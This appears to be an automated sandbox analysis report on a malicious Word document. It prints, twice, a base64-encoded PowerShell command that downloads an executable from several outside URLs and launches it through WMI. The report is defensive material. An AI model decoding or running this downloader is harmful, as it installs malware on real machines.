Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......'..............ul..................u..0.....D...T...........................'.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......+..._._.D.Y.N.A.S.T.Y. . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........+.......L...>...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......+..............ul..................u..0.....D...T...........................+.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l......./..._._.R.E.L.P.A.T.H. . . . . . . . .:. ...D...T.........................../.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l......./..............ul..................u..0.....D...T.........................../.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......3..._._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. .:. .2.D...T...........................3.......L...(...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......3..............ul..................u..0.....D...T.......(...................3.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......7..._._.D.E.R.I.V.A.T.I.O.N. . . . . .:. .{.}...T.......7...................7.......L...*...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......7..............ul..................u..0.....D...T.......@...................7.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......;..._._.S.E.R.V.E.R. . . . . . . . . .:. ...D...T.......N...................;.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......;..............ul..................u..0.....D...T.......W...................;.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......?..._._.N.A.M.E.S.P.A.C.E. . . . . . .:. ...D...T.......e...................?.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......?..............ul..................u..0.....D...T.......n...................?.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......C..._._.P.A.T.H. . . . . . . . . . . .:. ...D...T.......|...................C.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......C..............ul..................u..0.....D...T...........................C.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......G...P.r.o.c.e.s.s.I.d. . . . . . . . .:. .2.4.9.6...........................G.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......G..............ul..................u..0.....D...T...........................G.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......K...R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.D...T...........................K.......L...(...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......K..............ul..................u..0.....D...T...........................K.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................O.......|......u...................u..0.....D...T...........................O...............>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......S..............uL..................u..0.....D...T...........................S.......,.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......W..............uL..................u..0.....D...T...........................W.......,.......>..u........
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\317.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\UXInit\UXInit.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\UXInit\UXInit.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: form.docVirustotal: Detection: 62%
Source: form.docReversingLabs TitaniumCloud: Detection: 54%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABSAG8AbQBiAHcAYgBvAGMAZwBwAGgAYQBmAD0AJwBRAGsAeQBkAHMAZwBlAHIAagBqAGYAJwA7ACQAUgBxAGsAbQBxAGEAcABsAHcAIAA9ACAAJwAzADEANwAnADsAJABNAG0AZgBmAGYAYQBpAHQAbABoAHMAPQAnAE8AcwBqAHEAZgBlAGEAawBmAG0AcwBsACcAOwAkAFIAeABnAG4AZAB1AGMAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgBxAGsAbQBxAGEAcABsAHcAKwAnAC4AZQB4AGUAJwA7ACQAWABjAHMAcQB0AHgAbQB1AGMAYgB1AD0AJwBIAHcAeQBxAGsAZQBtAHAAeQAnADsAJABaAGEAcgBuAG4AYgBsAHcAdgB0AGkAbQA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASQB6AG0AdwB4AGIAeQB1AGMAegA9ACcAaAB0AHQAcAA6AC8ALwBzAHAAbwByAHQAbgBhAGwALgBhAHoAdQByAGUAdwBlAGIAcwBpAHQAZQBzAC4AbgBlAHQALwBjAGEAbABlAG4AZABhAHIALwBYAHoAbwBvAC8AKgBoAHQAdABwADoALwAvAHQAZQBlAG8ALgBoAGkAZwBoAG8AbgBpAG4AZgBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAHQAeAAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBiAGwAdQBlAGIAZQBhAHIAeQBoAGkAbABsAHAAcgBvAGoAZQBjAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHEAMAA3AC8AKgBoAHQAdABwADoALwAvAHQAaABlAG0AZQBmAG8AbABrAHMALgBjAG8AbQAvAHQAcgBlAG4AZAB6AGIAZAAvAG8AYQBHAFoAQwBWAHMASgAvACoAaAB0AHQAcAA6AC8ALwB0AGUAYwBoAG8AdABlAGMAaABzAG8AbAB1AHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAOABtADYALwAnAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEAZABwAGYAaAB6AG4AdQBvAG0AbAByAD0AJwBaAHEAZwB1AHAAaQB2AGYAdwB0AG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEEAcAB1AGgAcQBiAHgAYgAgAGkAbgAgACQASQB6AG0AdwB4AGIAeQB1AGMAegApAHsAdAByAHkAewAkAFoAYQByAG4AbgBiAGwAdwB2AHQAaQBtAC4AIgBkAGAAbwB3AG4AbABvAGEAZABGAGAASQBMAGUAIgAoACQAQQBwAHUAaABxAGIAeABiACwAIAAkAFIAeABnAG4AZAB1AGMAdwApADsAJABIAGgAZQB4AHkAZAB6AHEAcQBoAGcAbQBkAD0AJwBMAHUAdwBmAGUAYQBsAG4AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABSAHgAZwBuAGQAdQBjAHcAKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAyADQANgAxADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAUgBFAEEAYABUAGUAIgAoACQAUgB4AGcAbgBkAHUAYwB3ACkAOwAkAFIAeAB1AGcAdwByAGEAZABnAG4APQAnAE0AbgB1AGEAaQBqAHoAaABtAHQAdgAnADsAYgByAGUAYQBrADsAJABYAGkAYgB2AHYAdAB5AGMAPQAnAEMAdwBqAGwAbwBtAHoAaABtAGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBrAGEAYwBlAGcAbgB3AHgAYgA9ACcAWQBqAHkAaABsAHUAbABtAHgAJwA=
Source: unknownProcess created: C:\Users\user\317.exe C:\Users\user\317.exe
Source: unknownProcess created: C:\Windows\System32\UXInit\UXInit.exe C:\Windows\system32\UXInit\UXInit.exe
Source: C:\Users\user\317.exeProcess created: C:\Windows\System32\UXInit\UXInit.exe C:\Windows\system32\UXInit\UXInit.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\317.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\User\Desktop\2005\6.2.20\ScrollerCtrl_demo\ScrollerTest\Release\ScrollerTest.pdb source: 317.exe, UXInit.exe, 00000004.00000002.1383142615.00401000.00000040.00020000.sdmp

Data Obfuscation:

barindex
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABSAG8AbQBiAHcAYgBvAGMAZwBwAGgAYQBmAD0AJwBRAGsAeQBkAHMAZwBlAHIAagBqAGYAJwA7ACQAUgBxAGsAbQBxAGEAcABsAHcAIAA9ACAAJwAzADEANwAnADsAJABNAG0AZgBmAGYAYQBpAHQAbABoAHMAPQAnAE8AcwBqAHEAZgBlAGEAawBmAG0AcwBsACcAOwAkAFIAeABnAG4AZAB1AGMAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgBxAGsAbQBxAGEAcABsAHcAKwAnAC4AZQB4AGUAJwA7ACQAWABjAHMAcQB0AHgAbQB1AGMAYgB1AD0AJwBIAHcAeQBxAGsAZQBtAHAAeQAnADsAJABaAGEAcgBuAG4AYgBsAHcAdgB0AGkAbQA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASQB6AG0AdwB4AGIAeQB1AGMAegA9ACcAaAB0AHQAcAA6AC8ALwBzAHAAbwByAHQAbgBhAGwALgBhAHoAdQByAGUAdwBlAGIAcwBpAHQAZQBzAC4AbgBlAHQALwBjAGEAbABlAG4AZABhAHIALwBYAHoAbwBvAC8AKgBoAHQAdABwADoALwAvAHQAZQBlAG8ALgBoAGkAZwBoAG8AbgBpAG4AZgBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAHQAeAAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBiAGwAdQBlAGIAZQBhAHIAeQBoAGkAbABsAHAAcgBvAGoAZQBjAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHEAMAA3AC8AKgBoAHQAdABwADoALwAvAHQAaABlAG0AZQBmAG8AbABrAHMALgBjAG8AbQAvAHQAcgBlAG4AZAB6AGIAZAAvAG8AYQBHAFoAQwBWAHMASgAvACoAaAB0AHQAcAA6AC8ALwB0AGUAYwBoAG8AdABlAGMAaABzAG8AbAB1AHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAOABtADYALwAnAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEAZABwAGYAaAB6AG4AdQBvAG0AbAByAD0AJwBaAHEAZwB1AHAAaQB2AGYAdwB0AG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEEAcAB1AGgAcQBiAHgAYgAgAGkAbgAgACQASQB6AG0AdwB4AGIAeQB1AGMAegApAHsAdAByAHkAewAkAFoAYQByAG4AbgBiAGwAdwB2AHQAaQBtAC4AIgBkAGAAbwB3AG4AbABvAGEAZABGAGAASQBMAGUAIgAoACQAQQBwAHUAaABxAGIAeABiACwAIAAkAFIAeABnAG4AZAB1AGMAdwApADsAJABIAGgAZQB4AHkAZAB6AHEAcQBoAGcAbQBkAD0AJwBMAHUAdwBmAGUAYQBsAG4AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABSAHgAZwBuAGQAdQBjAHcAKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAyADQANgAxADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAUgBFAEEAYABUAGUAIgAoACQAUgB4AGcAbgBkAHUAYwB3ACkAOwAkAFIAeAB1AGcAdwByAGEAZABnAG4APQAnAE0AbgB1AGEAaQBqAHoAaABtAHQAdgAnADsAYgByAGUAYQBrADsAJABYAGkAYgB2AHYAdAB5AGMAPQAnAEMAdwBqAGwAbwBtAHoAaABtAGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBrAGEAYwBlAGcAbgB3AHgAYgA9ACcAWQBqAHkAaABsAHUAbABtAHgAJwA=
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\317.exeCode function: 3_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\317.exeCode function: 3_2_0043CB3B push ecx; ret
Source: C:\Users\user\317.exeCode function: 3_2_0043D669 push ecx; ret
Source: C:\Users\user\317.exeCode function: 3_2_00209A9D push ecx; retf
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00209A9D push ecx; retf

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Users\user\317.exeExecutable created and started: C:\Windows\System32\UXInit\UXInit.exe

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\317.exeFile opened: C:\Windows\system32\UXInit\UXInit.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\317.exeCode function: 3_2_0040C2F1 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
Source: C:\Users\user\317.exeCode function: 3_2_0040C2A0 IsIconic,
Source: C:\Users\user\317.exeCode function: 3_2_00412DF2 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\317.exeCode function: 3_2_0042D6B9 IsWindowVisible,IsIconic,
Source: C:\Users\user\317.exeCode function: 3_2_00427884 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
